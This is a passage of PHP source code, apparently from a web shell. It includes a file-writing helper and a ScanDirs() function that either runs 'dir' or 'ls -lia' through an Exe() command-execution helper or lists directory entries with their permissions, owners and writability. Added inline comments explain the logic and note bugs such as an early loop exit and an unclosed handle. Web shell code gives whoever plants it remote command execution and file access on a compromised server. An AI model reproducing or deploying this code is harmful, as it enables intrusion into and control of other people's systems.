  2244. else if (function_exists('fputs')){$writeFile = fputs($file,$content); }
  2245. else if (function_exists('file_put_contents')){$writeFile = file_put_contents($file,$content);}
  2246. if(!$writeFile){return false;}
  2247. }
  2248. else{return false;}fclose($file);return true;
  2249. }
  2250. }
  2251. function ScanDirs() {
        // Produces the directory listing. In "cmd" mode it runs dir / ls -lia through Exe(), which
        // echoes the output; otherwise it walks the global $dir with opendir()/readdir() and builds a
        // text table of permissions, size, change time, owner/group, read/write flags, type and name.
        // Returns $result, which is only assigned in the non-cmd branch.
        // The stat calls receive the bare entry name, so they resolve against the process working
        // directory; presumably that equals $dir, which is not established in this block.
        // The loop condition uses a loose comparison (!= false), so an entry named "0" ends the listing early.
        // The directory handle is not closed.
  2252. global $os; global $dir;global $safeMode;global $dir_mode;
  2253. if($dir_mode == "cmd"){if($os == "Windows"){Exe('dir');}else{ Exe('ls -lia');}}
  2254. else {
  2255. $result .= "Perms Size Time Owner/Group R/W Type File
  2256. -----------------------------------------------------------------------------
  2257. ";
  2258. $handel = opendir($dir);
  2259. while(($file = readdir($handel))!= false)
  2260. {
  2261. $size = filesize($file);
  2262. if(filetype($file) == "dir"){$type = "<DIR>";}else {$type = "<FILE>";}
  2263. if(fileowner($file)){$owner = fileowner($file);}else{$owner = "NONE";}
  2264. if(filegroup($file)){$group = filegroup($file);}else{$group = "NONE";}
  2265. $perms = fileperms($file);
  2266. $time = date("y/m/d", filectime($file));
  2267. if(is_writable($file)){$isWritable = "Y";}else{$isWritable = "N";}
  2268. if(is_readable($file)){$isReadable = "Y";}else{$isReadable = "N";}
  2269. $result .= $perms." ".$size." ".$time." ".$owner."/".$group." ".$isReadable."/".$isWritable." ".$type." ".$file."
  2270. ";
  2271. }
  2272. }
  2273. return $result;
  2274. }
  2275. echo footer();
  2276. ?>